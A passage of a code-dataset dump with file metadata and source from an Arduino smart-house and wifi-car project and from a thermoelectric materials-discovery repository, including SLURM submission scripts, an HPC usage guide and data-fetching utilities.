"alphanum_fraction": 0.6383763551712036,
"avg_line_length": 15.9375,
"blob_id": "2aa4bf775decd7a2281b9d5b7170fab225e6b0c4",
"content_id": "ed6e799e45b23fab4e2284d39648200ad208dddf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 16,
"path": "/elSkateboard/CurrentSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __CURRENT_SENSOR_H__\n#define __CURRENT_SENSOR_H__\n\n#include <Arduino.h>\n#define CURRENT_RESOLUTION 0.0391 // = 20A / 512\n\nclass CurrentSensor\n{\n private:\n int pin;\n\n public:\n CurrentSensor(int _pin);\n float read();\n};\n#endif // __CURRENT_SENSOR_H__\n"
},
{
"alpha_fraction": 0.6394187211990356,
"alphanum_fraction": 0.6448683142662048,
"avg_line_length": 19.79245376586914,
"blob_id": "9dcfde01e0ddbaf609b7edc65e3791eb0c8b0b55",
"content_id": "c855a081733668db8b5537fc44b8ac1b725ac9c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1101,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 53,
"path": "/ArduinoController/bitlashRelay.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Provide bitlash wrap-up of a Relay instance.\n Relay instance has to be:\n 1. named \"relay\";\n 2. exist as global variale\n*/\n\nnumvar relay_on(void)\n{\n relay.on();\n return relay.cur_lvl();\n}\n\nnumvar relay_off(void)\n{\n relay.off();\n return relay.cur_lvl();\n}\n\nnumvar relay_cur_lvl(void)\n{\n return relay.cur_lvl();\n}\n\nnumvar relay_set_on_lvl(void)\n{\n if (getarg(0) == 1)\n {\n relay.on_lvl(getarg(1));\n return relay.cur_lvl();\n }\n return -1;\n}\n\nnumvar relay_get_on_lvl(void)\n{\n return relay.on_lvl();\n}\n\nnumvar relay_get_pin(void)\n{\n return relay.pin();\n}\n\nvoid register_bitlash_relay(void)\n{\n addBitlashFunction(\"relay_on\", (bitlash_function) relay_on);\n addBitlashFunction(\"relay_off\", (bitlash_function) relay_off);\n addBitlashFunction(\"relay_cur_lvl\", (bitlash_function) relay_cur_lvl);\n addBitlashFunction(\"relay_set_on_lvl\", (bitlash_function) relay_set_on_lvl);\n addBitlashFunction(\"relay_get_on_lvl\", (bitlash_function) relay_get_on_lvl);\n addBitlashFunction(\"relay_get_pin\", (bitlash_function) relay_get_pin);\n}"
},
{
"alpha_fraction": 0.5732700228691101,
"alphanum_fraction": 0.5909090638160706,
"avg_line_length": 25.799999237060547,
"blob_id": "a6d082457609b8d1d6a0e480a118681636e4ff02",
"content_id": "07bc37943bc5ef79230804bdb20108bfbb2dc3c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2948,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 110,
"path": "/WifiCar/RemoteController/RemoteController.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#include <Arduino.h>\n\n/* Left joy stick\n VCC <-> 5V, GND <-> GND\n VRx <-> PIN_A0\n VRy <-> PIN_A1\n SW <-> PIN_D2\n Right joy stick\n VCC <-> 5V, GND <-> GND\n VRx\t<-> PIN_A2\n VRy <-> PIN_A3\n SW <-> PIN_D3\n*/\n\nconst byte JOYSTICK_NONE = 0x00;\nconst byte JOYSTICK_LEFT = 0x01;\nconst byte JOYSTICK_RIGHT = 0x02;\nconst byte JOYSTICK_UP = 0x04;\nconst byte JOYSTICK_DOWN = 0x08;\nconst byte JOYSTICK_CLICK = 0x10;\n\nconst int LEFT_JOYSTICK_VRX_PIN = 0;\nconst int LEFT_JOYSTICK_VRY_PIN = 1;\nconst int LEFT_JOYSTICK_SW_PIN = 2;\nconst int RIGHT_JOYSTICK_VRX_PIN = 2;\nconst int RIGHT_JOYSTICK_VRY_PIN = 3;\nconst int RIGHT_JOYSTICK_SW_PIN = 3;\n\nconst int JOYSTICK_MIN = 0;\nconst int JOYSTICK_MAX = 1023;\nconst int JOYSTICK_MARGIN = 100;\n\nbyte joystick_left_init(int sw_pin = LEFT_JOYSTICK_SW_PIN)\n{\n pinMode(sw_pin, INPUT_PULLUP);\n}\n\nbyte joystick_right_init(int sw_pin = RIGHT_JOYSTICK_SW_PIN)\n{\n pinMode(sw_pin, INPUT_PULLUP);\n}\n\nbyte joystick_left(int vrx_pin = LEFT_JOYSTICK_VRX_PIN,\n int vry_pin = LEFT_JOYSTICK_VRY_PIN,\n int sw_pin = LEFT_JOYSTICK_SW_PIN)\n{\n int x, y, sw = 0;\n byte status = JOYSTICK_NONE;\n x = analogRead(vrx_pin);\n y = analogRead(vry_pin);\n sw = digitalRead(sw_pin);\n //Serial.print(String(\"left x=\") + x + \"\\ty=\" + y + \"\\tsw=\" + sw);\n if (x < JOYSTICK_MIN + JOYSTICK_MARGIN) {\n status |= JOYSTICK_DOWN;\n } else if (x > JOYSTICK_MAX - JOYSTICK_MARGIN) {\n status |= JOYSTICK_UP;\n }\n if (y < JOYSTICK_MIN + JOYSTICK_MARGIN) {\n status |= JOYSTICK_RIGHT;\n } else if (y > JOYSTICK_MAX - JOYSTICK_MARGIN) {\n status |= JOYSTICK_LEFT;\n }\n if (sw == 0) {\n status |= JOYSTICK_CLICK;\n }\n //Serial.println(String(\"\\tstatus=\") + status);\n return status;\n}\n\nbyte joystick_right(int vrx_pin = RIGHT_JOYSTICK_VRX_PIN,\n int vry_pin = RIGHT_JOYSTICK_VRY_PIN,\n int sw_pin = RIGHT_JOYSTICK_SW_PIN)\n{\n int x, y, sw = 0;\n byte status = JOYSTICK_NONE;\n x = analogRead(vrx_pin);\n y = analogRead(vry_pin);\n sw = digitalRead(sw_pin);\n //Serial.print(String(\"right x=\") + x + \"\\ty=\" + y + \"\\tsw=\" + sw);\n if (x < JOYSTICK_MIN + JOYSTICK_MARGIN) {\n status |= JOYSTICK_LEFT;\n } else if (x > JOYSTICK_MAX - JOYSTICK_MARGIN) {\n status |= JOYSTICK_RIGHT;\n }\n if (y < JOYSTICK_MIN + JOYSTICK_MARGIN) {\n status |= JOYSTICK_UP;\n } else if (y > JOYSTICK_MAX - JOYSTICK_MARGIN) {\n status |= JOYSTICK_DOWN;\n }\n if (sw == 0) {\n status |= JOYSTICK_CLICK;\n }\n //Serial.println(String(\"\\tstatus=\") + status);\n return status;\n}\n\nvoid setup()\n{\n Serial.begin(19200);\n joystick_left_init();\n joystick_right_init();\n}\n\nvoid loop()\n{\n int left_joystick_status, right_joystick_status;\n left_joystick_status = joystick_left();\n right_joystick_status = joystick_right();\n delay(400);\n}\n"
},
{
"alpha_fraction": 0.6001838445663452,
"alphanum_fraction": 0.6378676295280457,
"avg_line_length": 22.65217399597168,
"blob_id": "9e1587f4a08ebcdd3f944c10eeecc60ebbe10c07",
"content_id": "a2f06c43dd4f68f2615a395c385816d57fb42ae4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1088,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 46,
"path": "/WifiCar/Motor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n\n#ifndef __MOTOR_H__\n#define __MOTOR_H__\n\n#include <Arduino.h>\n#include \"protocol.h\"\n\nconst int MOTOR_STATUS_STOP = 0x00;\nconst int MOTOR_STATUS_FORWARD = 0x01;\nconst int MOTOR_STATUS_LEFT = 0x02;\nconst int MOTOR_STATUS_RIGHT = 0x03;\nconst int MOTOR_STATUS_BACKWARD= 0x04;\n\nconst int MOTOR_LONG_EXECUTION_TIMER = 5000; // 5 seconds\nconst int MOTOR_SHORT_EXECUTION_TIMER = 500; // 0.5 seconds\nconst int MOTOR_HIGHEST_SPEED = 255;\nconst int MOTOR_LOWEST_SPEED = 128;\nconst int MOTOR_SPEED_STEP = 25;\n\nclass Motor\n{\nprivate:\n int enA, in1, in2, enB, in3, in4;\n int speed;\n int long_execution_timer;\n int short_execution_timer;\n unsigned long last_update;\n\npublic:\n int status;\n Motor(int _enA, int _in1, int _in2, int _enB, int _in3, int _in4);\n void init(void);\n void execute(int op_code);\n void idle(void);\n void forward(void);\n void backward(void);\n void turnleft(void);\n void turnright(void);\n void stop(void);\n void speedup(void);\n void speeddown(void);\n};\n\n#endif // __MOTOR_H__\n"
}
] | 73 |
leftshore1224/thermo | https://github.com/leftshore1224/thermo | 9ea3b0cd65ae7629b5790ed858a7e9dca3efb8b5 | 0202a47ec8abacfd49b065ddd13ad060b0b9a1a3 | f0784981a238efc1dbbde14e7249844d48309ae0 | refs/heads/main | 2023-08-18T06:17:49.456605 | 2021-10-17T09:06:58 | 2021-10-17T09:06:58 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6382978558540344,
"alphanum_fraction": 0.6464330554008484,
"avg_line_length": 28.054546356201172,
"blob_id": "79c660f0f44058fb2f7d2bdac400dd726fde986b",
"content_id": "33aac11e5b86f0b2c392ab1fee172889e061315e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1598,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 55,
"path": "/thermo/utils/atom_count.py",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "\"\"\"This module was adapted from https://codereview.stackexchange.com/questions/181191.\nPass the total_atom_count/flatten_formula functions a chemical formula to get the\ntotal number of atoms or the number of atoms for each element, respectively.\n\"\"\"\n\nimport re\nfrom collections import Counter\n\n\nRE = re.compile(\n r\"(?P<atom>[A-Z][a-z]*)(?P<atom_count>\\d*)|\"\n r\"(?P<new_group>\\()|\"\n r\"\\)(?P<group_count>\\d*)|\"\n r\"(?P<UNEXPECTED_CHARACTER_IN_FORMULA>.+)\"\n)\n\n\ndef atom_count(stack, atom, atom_count=\"\", **_):\n \"\"\"Handle an atom with an optional count, e.g. H or Mg2.\"\"\"\n stack[-1][atom] += 1 if atom_count == \"\" else int(atom_count)\n\n\ndef new_group(stack, **_):\n \"\"\"Handle an opening parenthesis.\"\"\"\n stack.append(Counter())\n\n\ndef group_count(stack, group_count=\"\", **_):\n \"\"\"Handle a closing parenthesis with an optional group count.\"\"\"\n group_count = 1 if group_count == \"\" else int(group_count)\n group = stack.pop()\n for atom in group:\n group[atom] *= group_count\n stack[-1] += group\n\n\ndef formula_to_dict(formula):\n \"\"\"Generate a stack of formula transformations with successively unpacked\n groups and return the last one.\"\"\"\n stack = []\n new_group(stack)\n for match in RE.finditer(formula):\n globals()[match.lastgroup](stack, **match.groupdict())\n return stack[-1]\n\n\ndef flatten_formula(formula):\n d = formula_to_dict(formula)\n return \"\".join(\n atom + (str(count) if count > 1 else \"\") for atom, count in sorted(d.items())\n )\n\n\ndef total_atom_count(formula):\n return sum(formula_to_dict(formula).values())\n"
},
{
"alpha_fraction": 0.7962962985038757,
"alphanum_fraction": 0.7962962985038757,
"avg_line_length": 53,
"blob_id": "4441fd0b3b32cc1a71c3fcdf2bf3fd10b50c193b",
"content_id": "2581453035979b34f5be7ac37742dea9ae593635",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 3,
"path": "/thermo/data/__init__.py",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "from .fetch import fetch_cod, fetch_mp\nfrom .load import load_gaultois, load_screen\nfrom .transform import dropna, normalize, train_test_split, transform_df_cols\n"
},
{
"alpha_fraction": 0.5604490637779236,
"alphanum_fraction": 0.5903281569480896,
"avg_line_length": 33.05882263183594,
"blob_id": "622f24676ec2f22c0d2cf02b27a3a0279c0b0757",
"content_id": "0e0983e8db5a363c64a60f02072c7745e9b815aa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5790,
"license_type": "permissive",
"max_line_length": 305,
"num_lines": 170,
"path": "/hpc/readme.md",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "# CSD3 Guide\n\n## Submissions Scripts\n\nTo submit a CPU or GPU job, use `sbatch hpc/(c|g)pu_submit` after editing those files (if necessary). Rather than changing parameters directly in those files, you can pass in variables via the command line as follows:\n\n```sh\nsbatch --export var1='foo',var2='bar' hpc/(c|g)pu_submit\n```\n\nand then using those variables as e.g.\n\n```sh\necho var1 is '$var1' and var2 is '$var1'\n```\n\nTo change the job name and run time, use `sbatch -J job_name -t 1:0:0` (time format `h:m:s`). A complete example would be\n\n```sh\nsbatch -J job_name -t 1:0:0 --export CMD='python path/to/script.py --cli-arg 42' hpc/gpu_submit\n```\n\n## Array Jobs\n\nTo submit an array of, say 16 jobs, use\n\n```sh\nsbatch -J job_name -t 1:0:0 --array 0-15 --export CMD=\"python path/to/script.py --cli-arg 42 --random-seed \\$SLURM_ARRAY_TASK_ID\" hpc/gpu_submit\n```\n\nNote the backslash in front of `\\$SLURM_ARRAY_TASK_ID` which ensures the variable isn't expanded at job submission time but at execution time where it will have a value.\n\nYou may also read the task ID directly in the Python script via\n\n```py\ntask_id = int(sys.argv[1])\n```\n\nThis can for instance be used to run a grid of experiments:\n\n```py\ntask_id = int(sys.argv[1])\n\ndrop_rates, learning_rates = [0.1, 0.2, 0.3, 0.5], [1e-4, 3e-4, 1e-3, 3e-3]\ndrop_rate, learning_rate = tuple(itertools.product(drop_rates, learning_rates))[task_id]\n```\n\n## Environment\n\nTo setup dependencies, use `conda`\n\n```sh\nconda create -n py38 python\npip install -r requirements.txt\n```\n\n## Running Short Experiments\n\nShort interactive sessions are a good way to ensure a long job submitted via `(c|g)pu_submit` will run without errors in the actual HPC environment.\n\n[To request a 10-minute interactive CPU session](https://docs.hpc.cam.ac.uk/hpc/user-guide/interactive.html#sintr):\n\n```sh\nsintr -A LEE-SL3-CPU -p skylake -N2 -n2 -t 0:10:0 --qos=INTR\nmodule load rhel7/default-peta4\nscript job_name.log\n```\n\n- `sintr`: SLURM interactive\n- `-A LEE-SL3-CPU`: charge the session to account `LEE-SL3-CPU`\n- `-p skylake`: run on the Skylake partition\n- `-N1 -n1`: use single node\n- `-t 0:10:0` set session duration to 10 min\n- `--qos=INTR`: set quality of service to interactive\n\nTo request two nodes for an hour (the maximum interactive session duration), use\n\n```sh\nsintr -A LEE-SL3-CPU -p skylake -N2 -n2 -t 1:0:0 --qos=INTR\n```\n\nUseful for testing a job will run successfully in the actual environment it's going to run in without having to queue much.\n\nThe last line `script job_name.log` is optional but useful as it ensures everything printed to the terminal during the interactive session will be recorded in `job_name.log`. [See `script` docs](https://man7.org/linux/man-pages/man1/script.1.html).\n\nTo use service level 2, include your CRSId, i.e. `LEE-JR769-SL2-CPU` instead of `LEE-SL3-CPU`.\n\nSimilarly, for a 10-minute interactive GPU session:\n\n```sh\nsintr -A LEE-SL3-GPU -p ampere,pascal -N1 -n1 -t 0:10:0 --qos=INTR --gres=gpu:1\nmodule load rhel7/default-gpu\nscript job_name.log\n```\n\nBefore doing anything, that requires a GPU, remember to load\n\n```sh\nmodule load rhel7/default-gpu\n```\n\nTo specify CUDA version:\n\n```sh\nmodule load cuda/11.0\n```\n\nCheck current version with `nvcc --version`.\n\nTo check available hardware:\n\n```sh\nnvidia-smi\n```\n\nThis should print something like\n\n```text\nThu Oct 8 20:15:44 2020\n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 450.51.06 Driver Version: 450.51.06 CUDA Version: 11.0 |\n|-------------------------------+----------------------+----------------------+\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|===============================+======================+======================|\n| 0 Tesla P100-PCIE... On | 00000000:04:00.0 Off | 0 |\n| N/A 35C P0 28W / 250W | 0MiB / 16280MiB | 0% Default |\n| | | N/A |\n+-------------------------------+----------------------+----------------------+\n\n+-----------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=============================================================================|\n| No running processes found |\n+-----------------------------------------------------------------------------+\n```\n\n## Debugging Tips\n\nIf the interactive window won't launch over SSH, see [vscode-python#12560](https://github.com/microsoft/vscode-python/issues/12560).\n\nIf VS Code fails to connect to a remote (encountered once with exitCode 24), follow the steps to [clean up VS Code Server on the remote](https://code.visualstudio.com/docs/remote/troubleshooting#_cleaning-up-the-vs-code-server-on-the-remote) followed by reconnecting which reinstalls the remote extension.\n\n## Syncing Results\n\nTo sync results back from CSD3 to your local machine, use\n\n```sh\nrsync -av --delete login.hpc.cam.ac.uk:repo/results .\n```\n\n`-a`: archive mode, `-v`: increase verbosity, `--delete`: remove files from target not found in source.\n\nIf CSD3 was setup as an SSH alias in `~/.ssh/config`,\n\n```text\nHost csd3\n Hostname login.hpc.cam.ac.uk\n```\n\nThen it's simply:\n\n```sh\nrsync -av --delete csd3:repo/results .\n```\n\nAdd `-n` to test the command in a dry-run first. Will list each action that would have been performed.\n"
},
{
"alpha_fraction": 0.6717284321784973,
"alphanum_fraction": 0.6913800835609436,
"avg_line_length": 39.70909118652344,
"blob_id": "64abcb12e8c4c5c0070f3753ff669d9dc8d7cb91",
"content_id": "efa24573068e5307a60a237d91565817340cc948",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2239,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 55,
"path": "/hpc/gpu_submit",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n#! SLURM job script for Wilkes2 (Broadwell, ConnectX-4, P100)\n#! Last updated: Mon 13 Nov 12:06:57 GMT 2017\n#! https://docs.hpc.cam.ac.uk/hpc/user-guide/batch.html#sample-submission-scripts\n\n#! Which project should be charged (NB Wilkes2 projects end in '-GPU'):\n#SBATCH -A LEE-JR769-SL2-GPU\n\n#! How many whole nodes should be allocated?\n#SBATCH --nodes=1\n\n#! Specify the number of GPUs per node (between 1 and 4; must be 4 if nodes>1).\n#! Note: Charging is determined by GPU number * walltime.\n#SBATCH --gres=gpu:1\n\n#! How many (MPI) tasks will there be in total?\n#! This should probably not exceed the total number of GPUs in use.\n#SBATCH --ntasks=1\n\n#! What types of email messages to receive. Valid values include\n#! NONE, BEGIN, END, FAIL, REQUEUE, ALL. See https://slurm.schedmd.com/sbatch.html.\n#SBATCH --mail-type=FAIL\n\n#! Where to write standard out and standard error from this job. Can be the same file.\n#SBATCH --output=slurm-%x-%j.out\n\n#! The partition to use (do not change):\n#SBATCH -p ampere,pascal\n\n#! ------ sbatch directives end (put additional directives above this line)\n\n#! Modify the settings below to specify the job's environment, location and launch method.\n#! (SLURM reproduces the environment at submission irrespective of ~/.bashrc):\n. /etc/profile.d/modules.sh # Leave this line (enables the module command)\nmodule purge # Removes all modules still loaded\nmodule load rhel7/default-gpu # REQUIRED - loads the basic environment\n\n#! --- Single Job ---\n#! sbatch -J job_name -t 1:0:0 --export CMD='python path/to/script.py --cli-arg 42' hpc/gpu_submit\n\n# --- Array Job ---\n#! sbatch -J job_name -t 1:0:0 --array 0-15 --export CMD=\"python path/to/script.py --cli-arg 42 --random-seed \\$SLURM_ARRAY_TASK_ID\" hpc/gpu_submit\n#! or read the task id directly in the Python script via: task_id = int(sys.argv[1])\n\ncd $SLURM_SUBMIT_DIR\n\necho -e \"Job ID: $SLURM_JOB_ID\\nJob name: $SLURM_JOB_NAME\\n\"\necho \"Time: `date`\"\necho \"Running on master node: `hostname`\"\necho \"Current directory: `pwd`\"\necho -e \"\\nNodes allocated: num_tasks=$SLURM_NTASKS, num_nodes=$SLURM_JOB_NUM_NODES\"\necho -e \"\\nExecuting command:\\n$CMD\\n\\n==================\\n\"\n\neval $CMD\n"
},
{
"alpha_fraction": 0.8727272748947144,
"alphanum_fraction": 0.8727272748947144,
"avg_line_length": 9.3125,
"blob_id": "51d2199da67491785aba6826963b9bcaff36ea3a",
"content_id": "a06a965cfa9beba1f814d8b2a930032c19e99e32",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 165,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 16,
"path": "/requirements.txt",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "automatminer\ngurobipy\nmatminer\nmatplotlib\nml-matrics\nnumpy\npandas\nscikit-learn\nscikit-optimize\nscipy\nseaborn\ntensorflow\ntensorflow-probability\ntorch\ntqdm\numap-learn\n"
},
{
"alpha_fraction": 0.7675291299819946,
"alphanum_fraction": 0.7704917788505554,
"avg_line_length": 66.50666809082031,
"blob_id": "7d625dcf5a5d6e0e8d535b2616c14138f7c43457",
"content_id": "c0949a38e5bb826622b5fd6710de6b89c72dcb89",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5063,
"license_type": "permissive",
"max_line_length": 786,
"num_lines": 75,
"path": "/readme.md",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "# Data-Driven Risk-Conscious Thermoelectric Materials Discovery\n\n[](/license)\n[](https://github.com/janosh/thermo/graphs/contributors)\n[](https://github.com/janosh/thermo/commits)\n[](https://results.pre-commit.ci/latest/github/janosh/thermo/main)\n\n## Project description\n\nThe aim is to discover high figure of merit (_zT_ > 1) and sustainable (lead-free and rare earth-free) bulk thermoelectrics using machine learning-guided experimentation. The key advance is going beyond 'big data' which in this domain is unattainable for the foreseeable future since both first principles calculations and experimental synthesis and characterization of bulk thermoelectrics are costly and low throughput. Instead, we move towards so-called 'optimal data' by developing novel algorithms that optimize thermoelectric performance (_zT_) with minimal number of expensive calculations and experiments.\n\nTo date there has been no statistically robust approach to simultaneously incorporate experimental and model error into machine learning models in a search space with high opportunity cost and high latency (i.e. large time between prediction and validation).\n\nConsequently, searches have been unable to effectively guide experimentalists in the selection of exploring or exploiting new materials when the validation step is inherently low throughput and resource-intensive, as is the case for synthesizing new bulk functional materials like thermoelectrics. This project aims to implement a holistic pipeline to discover novel thermoelectrics: ML models predict the _zT_ of a large database of structures as well as their own uncertainty for each prediction. Candidate structures are then selected, based on maximizing _zT_ subject to a tolerable level of uncertainty, to proceed to the next stage where expensive experimental synthesis and characterization of high-_zT_ candidates are guided by Bayesian optimization and active machine learning.\n\n## Setup\n\nTo check out the code in this repo, reproduce results and start contributing to the project, clone the repo and create a `conda` environment containing all dependencies by running the following command (assumes you have `git` and `conda` installed)\n\n```sh\ngit clone https://github.com/janosh/thermo \\\n&& cd thermo \\\n&& pip install -r requirements.txt\n&& pre-commit install\n```\n\n## Usage\n\n### Locally\n\nRun any of the files in [`src/notebooks`](https://github.com/janosh/thermo/tree/main/notebooks). The recommended way to work with those files is using [VS Code](https://code.visualstudio.com) and its [Python extension](https://marketplace.visualstudio.com/items?itemName=ms-python.python). You'll see the results of running those files [in an interactive window](https://code.visualstudio.com/docs/python/jupyter-support-py) (similar to Jupyter).\n\nYou'll probably want to add the following VS Code settings for local module imports to work and for code changes in imported modules to be auto-reloaded into the interactive session:\n\n```json\n\"python.dataScience.runStartupCommands\": [\n \"%load_ext autoreload\",\n \"%autoreload 2\",\n \"import sys\",\n \"sys.path.append('${workspaceFolder}')\",\n \"sys.path.append('${workspaceFolder}/src')\",\n],\n```\n\n### HPC\n\nTo submit a job to [Cambridge University's CSD3](https://hpc.cam.ac.uk) HPC facility ([docs](https://docs.hpc.cam.ac.uk/hpc)):\n\n1. Connect via `ssh` using your [CRSid](https://help.uis.cam.ac.uk/new-starters/it-for-students/student-it-services/your-crsid) and password, e.g.\n\n ```sh\n ssh [email protected]\n ```\n\n2. Copy over the directory using `rsync`\n\n ```sh\n rsync -av --delete --include-from=hpc/rsync.include . [email protected]:thermoelectrics\n ```\n\n See `hpc/rsync.include` for a list of files that will be transferred to your CSD3 home directory. You can also simulate this command before executing it with the `--dry-run` option.\n\n3. To submit a single HPC job, enter\n\n ```sh\n sbatch hpc/gpu_submit\n ```\n\n For a job array, first modify the GPU submission script at `./hpc/gpu-submit` and make sure in the section `#! Run options for the application:` you comment out the line below `# single job` and uncomment the line `# array job`. Then again issue the `sbatch` command, this time including the `--array` option. E.g. to submit 16 jobs at once, use\n\n ```sh\n sbatch --array=0-15 hpc/gpu_submit\n ```\n\nFor a more user-friendly experience, you can also [request cluster resources through Jupyter](https://docs.hpc.cam.ac.uk/hpc/software-packages/jupyter.html) by first instantiating a notebook server and then specifying that as a [remote server in VS Code's interactive window](https://code.visualstudio.com/docs/python/jupyter-support#_connect-to-a-remote-jupyter-server).\n"
},
{
"alpha_fraction": 0.6778091192245483,
"alphanum_fraction": 0.6975433230400085,
"avg_line_length": 42.561405181884766,
"blob_id": "8ded289f6b807517867f4455b7b2b12c2b0a4048",
"content_id": "297b13e267153364549d184ae4559ecfd80adbc1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2483,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 57,
"path": "/hpc/cpu_submit",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#!\n#! SLURM job script for Peta4-Skylake (Skylake CPUs, OPA)\n#! Last updated: Mon 13 Nov 12:25:17 GMT 2017\n#! https://docs.hpc.cam.ac.uk/hpc/user-guide/batch.html#sample-submission-scripts\n\n#! Which project should be charged:\n#SBATCH -A LEE-SL3-CPU\n\n#! How many whole nodes should be allocated?\n#! Note: Charging is determined by core number * walltime.\n#SBATCH --nodes=1\n\n#! How many (MPI) tasks will there be in total? (<= nodes*32)\n#! The skylake/skylake-himem nodes have 32 CPUs (cores) each.\n#! Each task is allocated 1 core by default, and each core is allocated 5990MB (skylake)\n#! and 12040MB (skylake-himem). If this is insufficient, also specify\n#! --cpus-per-task and/or --mem (the latter specifies MB per node).\n#SBATCH --ntasks=1\n\n#! What types of email messages to receive. Valid values include\n#! NONE, BEGIN, END, FAIL, REQUEUE, ALL. See https://slurm.schedmd.com/sbatch.html.\n#SBATCH --mail-type=FAIL\n\n#! The partition to use\n#! For 6GB per CPU, set \"-p skylake\"; for 12GB per CPU, set \"-p skylake-himem\":\n#SBATCH -p skylake,skylake-himem,cclake\n\n#! Where to write standard out and standard error from this job. Can be the same file.\n#SBATCH --output=slurm-%x-%j.out\n\n#! ------ sbatch directives end here (put additional directives above this line)\n\n#! Modify the settings below to specify the job's environment, location and launch method.\n#! Optionally modify the environment seen by the application\n#! (note that SLURM reproduces the environment at submission irrespective of ~/.bashrc):\n. /etc/profile.d/modules.sh # Leave this line (enables the module command)\nmodule purge # Removes all modules still loaded\nmodule load rhel7/default-peta4 # REQUIRED - loads the basic environment\n\n#! --- Single Job ---\n#! sbatch -J job_name -t 1:0:0 --export CMD='python path/to/script.py --cli-arg 42' hpc/cpu_submit\n\n# --- Array Job ---\n#! sbatch -J job_name -t 1:0:0 --array 0-15 --export CMD=\"python path/to/script.py --cli-arg 42 --random-seed \\$SLURM_ARRAY_TASK_ID\" hpc/cpu_submit\n#! or read the task id directly in the Python script via: task_id = int(sys.argv[1])\n\ncd $SLURM_SUBMIT_DIR\n\necho -e \"Job ID: $SLURM_JOB_ID\\nJob name: $SLURM_JOB_NAME\\n\"\necho \"Time: `date`\"\necho \"Running on master node: `hostname`\"\necho \"Current directory: `pwd`\"\necho -e \"\\nNodes allocated: num_tasks=$SLURM_NTASKS, num_nodes=$SLURM_JOB_NUM_NODES\"\necho -e \"\\nExecuting command:\\n$CMD\\n\\n==================\\n\"\n\neval $CMD\n"
},
{
"alpha_fraction": 0.6588991284370422,
"alphanum_fraction": 0.6621133089065552,
"avg_line_length": 36.712120056152344,
"blob_id": "f92b0ce63722873a2c1da0925ff9f7601969270e",
"content_id": "dd860d1a92aeebd299f7b399b4dd9d8a9970efe6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2489,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 66,
"path": "/thermo/data/fetch.py",
"repo_name": "leftshore1224/thermo",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nfrom pymatgen import MPRester\nfrom pymatgen.ext.cod import COD\n\nfrom thermo.utils import ROOT\n\n\ndef fetch_mp(criteria={}, properties=[], save_to=None):\n \"\"\"Fetch data from the Materials Project (MP).\n Docs at https://docs.materialsproject.org.\n Pymatgen MP source at https://pymatgen.org/_modules/pymatgen/ext/matproj.\n\n Note: Unlike ICSD - a database of materials that actually exist - MP has\n all structures where DFT+U converges. Those can be thermodynamically\n unstable if they lie above the convex hull. Set criteria = {\"e_above_hull\": 0}\n to get stable materials only.\n\n Args:\n criteria (dict, optional): filter criteria which returned items must\n satisfy, e.g. criteria = {\"material_id\": {\"$in\": [\"mp-7988\", \"mp-69\"]}}.\n Supports all features of the Mongo query syntax.\n properties (list, optional): quantities of interest, can be selected from\n https://materialsproject.org/docs/api#resources_1 or\n MPRester().supported_properties.\n save_to (str, optional): Pass a file path to save the data returned by MP\n API as CSV. Defaults to None.\n\n Returns:\n df: pandas DataFrame with a column for each requested property\n \"\"\"\n\n properties = list({*properties, \"material_id\"}) # use set to remove dupes\n\n # MPRester connects to the Material Project REST interface.\n # API keys available at https://materialsproject.org/dashboard.\n with MPRester() as mp:\n # mp.query performs the actual API call.\n data = mp.query(criteria, properties)\n\n if data:\n df = pd.DataFrame(data)[properties] # ensure same column order as in properties\n\n df = df.set_index(\"material_id\")\n\n if 